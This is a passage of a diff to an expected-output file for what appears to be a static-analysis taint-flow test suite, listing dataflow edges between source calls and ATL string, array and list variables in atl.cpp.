| | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:461:16:461:16 | x | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:468:20:468:20 | x | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:472:16:472:16 | x | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:480:11:480:11 | x | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:494:20:494:20 | x | | -| atl.cpp:461:16:461:16 | x | atl.cpp:461:16:461:17 | call to CComBSTR | TAINT | -| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:462:10:462:10 | b | | -| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:464:17:464:17 | b | | -| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:466:3:466:3 | b | | -| atl.cpp:462:10:462:10 | b [post update] | atl.cpp:464:17:464:17 | b | | -| atl.cpp:462:10:462:10 | b [post update] | atl.cpp:466:3:466:3 | b | | -| atl.cpp:462:12:462:16 | ref arg m_str | atl.cpp:465:13:465:17 | m_str | | -| atl.cpp:464:17:464:17 | b | atl.cpp:464:17:464:18 | call to CComBSTR | | -| atl.cpp:464:17:464:18 | call to CComBSTR | atl.cpp:465:10:465:11 | b2 | | -| atl.cpp:464:17:464:18 | call to CComBSTR | atl.cpp:466:3:466:3 | b2 | | -| atl.cpp:465:10:465:11 | b2 [post update] | atl.cpp:466:3:466:3 | b2 | | -| atl.cpp:468:16:468:21 | call to CComBSTR | atl.cpp:469:10:469:10 | b | | -| atl.cpp:468:16:468:21 | call to CComBSTR | atl.cpp:470:3:470:3 | b | | -| atl.cpp:469:10:469:10 | b [post update] | atl.cpp:470:3:470:3 | b | | -| atl.cpp:472:16:472:16 | x | atl.cpp:472:16:472:17 | call to CComBSTR | TAINT | -| atl.cpp:472:16:472:17 | call to CComBSTR | atl.cpp:476:11:476:11 | b | | -| atl.cpp:472:16:472:17 | call to CComBSTR | atl.cpp:512:3:512:3 | b | | -| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:475:10:475:11 | b2 | | -| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:476:5:476:6 | b2 | | -| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:477:10:477:11 | b2 | | -| atl.cpp:474:14:474:15 | call to CComBSTR | 
atl.cpp:512:3:512:3 | b2 | | -| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:476:5:476:6 | b2 | | -| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:477:10:477:11 | b2 | | -| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:512:3:512:3 | b2 | | -| atl.cpp:475:13:475:17 | ref arg m_str | atl.cpp:477:13:477:17 | m_str | | -| atl.cpp:476:5:476:6 | ref arg b2 | atl.cpp:477:10:477:11 | b2 | | -| atl.cpp:476:5:476:6 | ref arg b2 | atl.cpp:512:3:512:3 | b2 | | -| atl.cpp:477:10:477:11 | b2 [post update] | atl.cpp:512:3:512:3 | b2 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:480:5:480:6 | b3 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:481:10:481:11 | b3 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:482:28:482:29 | b3 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:483:13:483:14 | b3 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:481:10:481:11 | b3 | | -| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:482:28:482:29 | b3 | | -| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:483:13:483:14 | b3 | | -| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:480:11:480:11 | x | atl.cpp:480:11:480:11 | call to CComBSTR | TAINT | -| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:482:28:482:29 | b3 | | -| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:483:13:483:14 | b3 | | -| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:482:28:482:29 | ref arg b3 | atl.cpp:483:13:483:14 | b3 | | -| atl.cpp:482:28:482:29 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:483:11:483:14 | * ... | atl.cpp:483:10:483:14 | * ... | TAINT | -| atl.cpp:483:12:483:12 | call to operator& | atl.cpp:483:11:483:14 | * ... 
| TAINT | -| atl.cpp:483:13:483:14 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:486:5:486:6 | b4 | | -| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:487:10:487:11 | b4 | | -| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:490:19:490:20 | b4 | | -| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b4 | | -| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:487:10:487:11 | b4 | | -| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:490:19:490:20 | b4 | | -| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:512:3:512:3 | b4 | | -| atl.cpp:487:10:487:11 | b4 [post update] | atl.cpp:490:19:490:20 | b4 | | -| atl.cpp:487:10:487:11 | b4 [post update] | atl.cpp:512:3:512:3 | b4 | | -| atl.cpp:487:13:487:17 | ref arg m_str | atl.cpp:490:22:490:26 | m_str | | -| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:490:5:490:6 | b5 | | -| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:491:10:491:11 | b5 | | -| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b5 | | -| atl.cpp:490:5:490:6 | ref arg b5 | atl.cpp:491:10:491:11 | b5 | | -| atl.cpp:490:5:490:6 | ref arg b5 | atl.cpp:512:3:512:3 | b5 | | -| atl.cpp:490:19:490:20 | b4 [post update] | atl.cpp:512:3:512:3 | b4 | | -| atl.cpp:491:10:491:11 | b5 [post update] | atl.cpp:512:3:512:3 | b5 | | -| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:494:5:494:6 | b6 | | -| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:495:10:495:11 | b6 | | -| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b6 | | -| atl.cpp:494:5:494:6 | ref arg b6 | atl.cpp:495:10:495:11 | b6 | | -| atl.cpp:494:5:494:6 | ref arg b6 | atl.cpp:512:3:512:3 | b6 | | -| atl.cpp:495:10:495:11 | b6 [post update] | atl.cpp:512:3:512:3 | b6 | | -| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:498:5:498:6 | b7 | | -| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:499:10:499:11 | b7 | | -| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:502:19:502:20 | b7 | | -| 
atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b7 | | -| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:499:10:499:11 | b7 | | -| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:502:19:502:20 | b7 | | -| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:512:3:512:3 | b7 | | -| atl.cpp:499:10:499:11 | b7 [post update] | atl.cpp:502:19:502:20 | b7 | | -| atl.cpp:499:10:499:11 | b7 [post update] | atl.cpp:512:3:512:3 | b7 | | -| atl.cpp:499:13:499:17 | ref arg m_str | atl.cpp:502:22:502:26 | m_str | | -| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:502:5:502:6 | b8 | | -| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:503:10:503:11 | b8 | | -| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b8 | | -| atl.cpp:502:5:502:6 | ref arg b8 | atl.cpp:503:10:503:11 | b8 | | -| atl.cpp:502:5:502:6 | ref arg b8 | atl.cpp:512:3:512:3 | b8 | | -| atl.cpp:502:19:502:20 | b7 [post update] | atl.cpp:512:3:512:3 | b7 | | -| atl.cpp:503:10:503:11 | b8 [post update] | atl.cpp:512:3:512:3 | b8 | | -| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:507:5:507:6 | b9 | | -| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:508:5:508:6 | b9 | | -| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:511:10:511:11 | b9 | | -| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b9 | | -| atl.cpp:506:15:506:18 | safe | atl.cpp:508:21:508:24 | safe | | -| atl.cpp:506:15:506:18 | safe | atl.cpp:509:10:509:13 | safe | | -| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:508:5:508:6 | b9 | | -| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:511:10:511:11 | b9 | | -| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | -| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:511:10:511:11 | b9 | | -| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | -| atl.cpp:508:20:508:24 | ref arg & ... | atl.cpp:508:21:508:24 | safe [inner post update] | | -| atl.cpp:508:20:508:24 | ref arg & ... 
| atl.cpp:509:10:509:13 | safe | | -| atl.cpp:508:21:508:24 | safe | atl.cpp:508:20:508:24 | & ... | | -| atl.cpp:511:10:511:11 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | -| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:516:16:516:16 | w | | -| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:520:15:520:15 | w | | -| atl.cpp:514:16:514:39 | call to indirect_source | atl.cpp:524:20:524:20 | w | | -| atl.cpp:516:16:516:16 | ref arg w | atl.cpp:520:15:520:15 | w | | -| atl.cpp:516:16:516:16 | ref arg w | atl.cpp:524:20:524:20 | w | | -| atl.cpp:516:16:516:16 | w | atl.cpp:516:16:516:17 | call to CComBSTR | TAINT | -| atl.cpp:516:16:516:17 | call to CComBSTR | atl.cpp:517:10:517:10 | b | | -| atl.cpp:516:16:516:17 | call to CComBSTR | atl.cpp:522:3:522:3 | b | | -| atl.cpp:517:10:517:10 | b [post update] | atl.cpp:522:3:522:3 | b | | -| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:520:5:520:6 | b2 | | -| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:521:10:521:11 | b2 | | -| atl.cpp:519:14:519:15 | call to CComBSTR | atl.cpp:522:3:522:3 | b2 | | -| atl.cpp:520:5:520:6 | ref arg b2 | atl.cpp:521:10:521:11 | b2 | | -| atl.cpp:520:5:520:6 | ref arg b2 | atl.cpp:522:3:522:3 | b2 | | -| atl.cpp:520:15:520:15 | ref arg w | atl.cpp:524:20:524:20 | w | | -| atl.cpp:521:10:521:11 | b2 [post update] | atl.cpp:522:3:522:3 | b2 | | -| atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:525:10:525:10 | b | | -| atl.cpp:524:16:524:21 | call to CComBSTR | atl.cpp:526:3:526:3 | b | | -| atl.cpp:525:10:525:10 | b [post update] | atl.cpp:526:3:526:3 | b | | -| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:572:8:572:11 | safe | | -| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:574:24:574:27 | safe | | -| atl.cpp:571:22:571:33 | call to getSafeArray | atl.cpp:585:11:585:14 | safe | | -| atl.cpp:572:8:572:11 | safe [post update] | atl.cpp:574:24:574:27 | safe | | -| atl.cpp:572:8:572:11 | safe [post update] | atl.cpp:585:11:585:14 | safe | 
| -| atl.cpp:574:24:574:27 | safe | atl.cpp:574:24:574:28 | call to CComSafeArray | TAINT | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:575:8:575:8 | c | | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:576:8:576:8 | c | | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:577:8:577:8 | c | | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:578:8:578:8 | c | | -| atl.cpp:574:24:574:28 | call to CComSafeArray | atl.cpp:579:3:579:3 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:576:8:576:8 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:577:8:577:8 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:578:8:578:8 | c | | -| atl.cpp:575:8:575:8 | ref arg c | atl.cpp:579:3:579:3 | c | | +| atl.cpp:33:30:33:30 | 1 | atl.cpp:33:29:33:30 | - ... | TAINT | +| atl.cpp:77:14:77:25 | call to source | atl.cpp:78:21:78:21 | x | | +| atl.cpp:78:21:78:21 | x | atl.cpp:78:21:78:22 | call to _U_STRINGorID | TAINT | +| atl.cpp:78:21:78:22 | call to _U_STRINGorID | atl.cpp:79:10:79:10 | u | | +| atl.cpp:83:17:83:43 | call to indirect_source | atl.cpp:84:21:84:21 | y | | +| atl.cpp:84:21:84:21 | y | atl.cpp:84:21:84:22 | call to _U_STRINGorID | TAINT | +| atl.cpp:84:21:84:22 | call to _U_STRINGorID | atl.cpp:85:10:85:10 | u | | +| atl.cpp:104:15:104:35 | call to indirect_source | atl.cpp:105:19:105:19 | x | | +| atl.cpp:105:19:105:19 | x | atl.cpp:105:19:105:20 | call to CA2AEX | TAINT | +| atl.cpp:105:19:105:20 | call to CA2AEX | atl.cpp:106:29:106:29 | a | | +| atl.cpp:105:19:105:20 | call to CA2AEX | atl.cpp:107:10:107:10 | a | | +| atl.cpp:105:19:105:20 | call to CA2AEX | atl.cpp:108:10:108:10 | a | | +| atl.cpp:105:19:105:20 | call to CA2AEX | atl.cpp:109:3:109:3 | a | | +| atl.cpp:106:29:106:29 | ref arg a | atl.cpp:107:10:107:10 | a | | +| atl.cpp:106:29:106:29 | ref arg a | atl.cpp:108:10:108:10 | a | | +| atl.cpp:106:29:106:29 | ref arg a | atl.cpp:109:3:109:3 | a | | +| atl.cpp:107:10:107:10 | a [post update] | 
atl.cpp:108:10:108:10 | a | | +| atl.cpp:107:10:107:10 | a [post update] | atl.cpp:109:3:109:3 | a | | +| atl.cpp:108:10:108:10 | a [post update] | atl.cpp:109:3:109:3 | a | | +| atl.cpp:112:15:112:35 | call to indirect_source | atl.cpp:113:19:113:19 | x | | +| atl.cpp:113:19:113:23 | call to CA2AEX | atl.cpp:114:29:114:29 | a | | +| atl.cpp:113:19:113:23 | call to CA2AEX | atl.cpp:115:10:115:10 | a | | +| atl.cpp:113:19:113:23 | call to CA2AEX | atl.cpp:116:10:116:10 | a | | +| atl.cpp:113:19:113:23 | call to CA2AEX | atl.cpp:117:3:117:3 | a | | +| atl.cpp:114:29:114:29 | ref arg a | atl.cpp:115:10:115:10 | a | | +| atl.cpp:114:29:114:29 | ref arg a | atl.cpp:116:10:116:10 | a | | +| atl.cpp:114:29:114:29 | ref arg a | atl.cpp:117:3:117:3 | a | | +| atl.cpp:115:10:115:10 | a [post update] | atl.cpp:116:10:116:10 | a | | +| atl.cpp:115:10:115:10 | a [post update] | atl.cpp:117:3:117:3 | a | | +| atl.cpp:116:10:116:10 | a [post update] | atl.cpp:117:3:117:3 | a | | +| atl.cpp:130:14:130:34 | call to indirect_source | atl.cpp:132:20:132:20 | x | | +| atl.cpp:130:14:130:34 | call to indirect_source | atl.cpp:138:20:138:20 | x | | +| atl.cpp:132:20:132:20 | x | atl.cpp:132:20:132:21 | call to CA2CAEX | TAINT | +| atl.cpp:132:20:132:21 | call to CA2CAEX | atl.cpp:133:30:133:30 | a | | +| atl.cpp:132:20:132:21 | call to CA2CAEX | atl.cpp:134:10:134:10 | a | | +| atl.cpp:132:20:132:21 | call to CA2CAEX | atl.cpp:135:10:135:10 | a | | +| atl.cpp:132:20:132:21 | call to CA2CAEX | atl.cpp:136:3:136:3 | a | | +| atl.cpp:138:20:138:24 | call to CA2CAEX | atl.cpp:139:30:139:30 | a | | +| atl.cpp:138:20:138:24 | call to CA2CAEX | atl.cpp:140:10:140:10 | a | | +| atl.cpp:138:20:138:24 | call to CA2CAEX | atl.cpp:141:10:141:10 | a | | +| atl.cpp:138:20:138:24 | call to CA2CAEX | atl.cpp:142:3:142:3 | a | | +| atl.cpp:156:14:156:34 | call to indirect_source | atl.cpp:158:19:158:19 | x | | +| atl.cpp:156:14:156:34 | call to indirect_source | atl.cpp:164:19:164:19 | x | | +| 
atl.cpp:158:19:158:19 | x | atl.cpp:158:19:158:20 | call to CA2WEX | TAINT | +| atl.cpp:158:19:158:20 | call to CA2WEX | atl.cpp:159:30:159:30 | a | | +| atl.cpp:158:19:158:20 | call to CA2WEX | atl.cpp:160:10:160:10 | a | | +| atl.cpp:158:19:158:20 | call to CA2WEX | atl.cpp:161:10:161:10 | a | | +| atl.cpp:158:19:158:20 | call to CA2WEX | atl.cpp:162:3:162:3 | a | | +| atl.cpp:159:30:159:30 | ref arg a | atl.cpp:160:10:160:10 | a | | +| atl.cpp:159:30:159:30 | ref arg a | atl.cpp:161:10:161:10 | a | | +| atl.cpp:159:30:159:30 | ref arg a | atl.cpp:162:3:162:3 | a | | +| atl.cpp:160:10:160:10 | a [post update] | atl.cpp:161:10:161:10 | a | | +| atl.cpp:160:10:160:10 | a [post update] | atl.cpp:162:3:162:3 | a | | +| atl.cpp:160:12:160:16 | ref arg m_psz | atl.cpp:161:12:161:16 | m_psz | | +| atl.cpp:161:10:161:10 | a [post update] | atl.cpp:162:3:162:3 | a | | +| atl.cpp:164:19:164:23 | call to CA2WEX | atl.cpp:165:30:165:30 | a | | +| atl.cpp:164:19:164:23 | call to CA2WEX | atl.cpp:166:10:166:10 | a | | +| atl.cpp:164:19:164:23 | call to CA2WEX | atl.cpp:167:10:167:10 | a | | +| atl.cpp:164:19:164:23 | call to CA2WEX | atl.cpp:168:3:168:3 | a | | +| atl.cpp:165:30:165:30 | ref arg a | atl.cpp:166:10:166:10 | a | | +| atl.cpp:165:30:165:30 | ref arg a | atl.cpp:167:10:167:10 | a | | +| atl.cpp:165:30:165:30 | ref arg a | atl.cpp:168:3:168:3 | a | | +| atl.cpp:166:10:166:10 | a [post update] | atl.cpp:167:10:167:10 | a | | +| atl.cpp:166:10:166:10 | a [post update] | atl.cpp:168:3:168:3 | a | | +| atl.cpp:166:12:166:16 | ref arg m_psz | atl.cpp:167:12:167:16 | m_psz | | +| atl.cpp:167:10:167:10 | a [post update] | atl.cpp:168:3:168:3 | a | | +| atl.cpp:216:11:216:21 | call to source | atl.cpp:220:11:220:11 | x | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:220:5:220:5 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:221:10:221:10 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:222:5:222:5 | a | | +| atl.cpp:219:20:219:20 | 
call to CAtlArray | atl.cpp:223:10:223:10 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:227:15:227:15 | a | | +| atl.cpp:219:20:219:20 | call to CAtlArray | atl.cpp:242:3:242:3 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:221:10:221:10 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:222:5:222:5 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:223:10:223:10 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:227:15:227:15 | a | | +| atl.cpp:220:5:220:5 | ref arg a | atl.cpp:242:3:242:3 | a | | +| atl.cpp:221:10:221:10 | ref arg a | atl.cpp:222:5:222:5 | a | | +| atl.cpp:221:10:221:10 | ref arg a | atl.cpp:223:10:223:10 | a | | +| atl.cpp:221:10:221:10 | ref arg a | atl.cpp:227:15:227:15 | a | | +| atl.cpp:221:10:221:10 | ref arg a | atl.cpp:242:3:242:3 | a | | +| atl.cpp:222:5:222:5 | ref arg a | atl.cpp:223:10:223:10 | a | | +| atl.cpp:222:5:222:5 | ref arg a | atl.cpp:227:15:227:15 | a | | +| atl.cpp:222:5:222:5 | ref arg a | atl.cpp:242:3:242:3 | a | | +| atl.cpp:223:10:223:10 | ref arg a | atl.cpp:227:15:227:15 | a | | +| atl.cpp:223:10:223:10 | ref arg a | atl.cpp:242:3:242:3 | a | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:226:10:226:11 | a2 | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:227:5:227:6 | a2 | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:228:10:228:11 | a2 | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:232:13:232:14 | a2 | | +| atl.cpp:225:20:225:21 | call to CAtlArray | atl.cpp:242:3:242:3 | a2 | | +| atl.cpp:226:10:226:11 | ref arg a2 | atl.cpp:227:5:227:6 | a2 | | +| atl.cpp:226:10:226:11 | ref arg a2 | atl.cpp:228:10:228:11 | a2 | | +| atl.cpp:226:10:226:11 | ref arg a2 | atl.cpp:232:13:232:14 | a2 | | +| atl.cpp:226:10:226:11 | ref arg a2 | atl.cpp:242:3:242:3 | a2 | | +| atl.cpp:227:5:227:6 | ref arg a2 | atl.cpp:228:10:228:11 | a2 | | +| atl.cpp:227:5:227:6 | ref arg a2 | atl.cpp:232:13:232:14 | a2 | | +| atl.cpp:227:5:227:6 | ref arg a2 | 
atl.cpp:242:3:242:3 | a2 | | +| atl.cpp:228:10:228:11 | ref arg a2 | atl.cpp:232:13:232:14 | a2 | | +| atl.cpp:228:10:228:11 | ref arg a2 | atl.cpp:242:3:242:3 | a2 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:231:10:231:11 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:232:5:232:6 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:233:10:233:11 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:235:10:235:11 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:230:20:230:21 | call to CAtlArray | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:232:5:232:6 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:233:10:233:11 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:235:10:235:11 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:231:10:231:11 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:233:10:233:11 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:235:10:235:11 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:232:5:232:6 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:233:10:233:11 | ref arg a3 | atl.cpp:235:10:235:11 | a3 | | +| atl.cpp:233:10:233:11 | ref arg a3 | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:233:10:233:11 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:233:10:233:11 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:235:10:235:11 | ref arg a3 | atl.cpp:236:11:236:12 | a3 | | +| atl.cpp:235:10:235:11 | ref arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:235:10:235:11 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:236:11:236:12 | ref 
arg a3 | atl.cpp:240:26:240:27 | a3 | | +| atl.cpp:236:11:236:12 | ref arg a3 | atl.cpp:242:3:242:3 | a3 | | +| atl.cpp:236:14:236:20 | call to GetData | atl.cpp:236:10:236:22 | * ... | TAINT | +| atl.cpp:238:20:238:21 | call to CAtlArray | atl.cpp:239:10:239:11 | a4 | | +| atl.cpp:238:20:238:21 | call to CAtlArray | atl.cpp:240:5:240:6 | a4 | | +| atl.cpp:238:20:238:21 | call to CAtlArray | atl.cpp:241:10:241:11 | a4 | | +| atl.cpp:238:20:238:21 | call to CAtlArray | atl.cpp:242:3:242:3 | a4 | | +| atl.cpp:239:10:239:11 | ref arg a4 | atl.cpp:240:5:240:6 | a4 | | +| atl.cpp:239:10:239:11 | ref arg a4 | atl.cpp:241:10:241:11 | a4 | | +| atl.cpp:239:10:239:11 | ref arg a4 | atl.cpp:242:3:242:3 | a4 | | +| atl.cpp:240:5:240:6 | ref arg a4 | atl.cpp:241:10:241:11 | a4 | | +| atl.cpp:240:5:240:6 | ref arg a4 | atl.cpp:242:3:242:3 | a4 | | +| atl.cpp:240:26:240:27 | a3 | atl.cpp:240:25:240:27 | & ... | | +| atl.cpp:241:10:241:11 | ref arg a4 | atl.cpp:242:3:242:3 | a4 | | +| atl.cpp:244:20:244:21 | call to CAtlArray | atl.cpp:245:5:245:6 | a5 | | +| atl.cpp:244:20:244:21 | call to CAtlArray | atl.cpp:246:10:246:11 | a5 | | +| atl.cpp:244:20:244:21 | call to CAtlArray | atl.cpp:251:3:251:3 | a5 | | +| atl.cpp:245:5:245:6 | ref arg a5 | atl.cpp:246:10:246:11 | a5 | | +| atl.cpp:245:5:245:6 | ref arg a5 | atl.cpp:251:3:251:3 | a5 | | +| atl.cpp:246:10:246:11 | ref arg a5 | atl.cpp:251:3:251:3 | a5 | | +| atl.cpp:248:20:248:21 | call to CAtlArray | atl.cpp:249:5:249:6 | a6 | | +| atl.cpp:248:20:248:21 | call to CAtlArray | atl.cpp:250:10:250:11 | a6 | | +| atl.cpp:248:20:248:21 | call to CAtlArray | atl.cpp:251:3:251:3 | a6 | | +| atl.cpp:249:5:249:6 | ref arg a6 | atl.cpp:250:10:250:11 | a6 | | +| atl.cpp:249:5:249:6 | ref arg a6 | atl.cpp:251:3:251:3 | a6 | | +| atl.cpp:250:10:250:11 | ref arg a6 | atl.cpp:251:3:251:3 | a6 | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:300:18:300:18 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:308:19:308:19 | x | | 
+| atl.cpp:296:11:296:21 | call to source | atl.cpp:317:29:317:29 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:323:21:323:21 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:331:30:331:30 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:338:31:338:31 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:343:44:343:44 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:352:18:352:18 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:360:19:360:19 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:369:29:369:29 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:375:21:375:21 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:383:30:383:30 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:390:31:390:31 | x | | +| atl.cpp:296:11:296:21 | call to source | atl.cpp:395:44:395:44 | x | | +| atl.cpp:298:24:298:25 | 10 | atl.cpp:298:24:298:26 | call to CAtlList | TAINT | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:299:10:299:13 | list | | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:300:5:300:8 | list | | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:301:10:301:13 | list | | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:304:24:304:27 | list | | +| atl.cpp:298:24:298:26 | call to CAtlList | atl.cpp:346:3:346:3 | list | | +| atl.cpp:299:10:299:13 | ref arg list | atl.cpp:300:5:300:8 | list | | +| atl.cpp:299:10:299:13 | ref arg list | atl.cpp:301:10:301:13 | list | | +| atl.cpp:299:10:299:13 | ref arg list | atl.cpp:304:24:304:27 | list | | +| atl.cpp:299:10:299:13 | ref arg list | atl.cpp:346:3:346:3 | list | | +| atl.cpp:300:5:300:8 | ref arg list | atl.cpp:301:10:301:13 | list | | +| atl.cpp:300:5:300:8 | ref arg list | atl.cpp:304:24:304:27 | list | | +| atl.cpp:300:5:300:8 | ref arg list | atl.cpp:346:3:346:3 | list | | +| atl.cpp:301:10:301:13 | ref arg list | atl.cpp:304:24:304:27 | list | | +| atl.cpp:301:10:301:13 | ref arg list | 
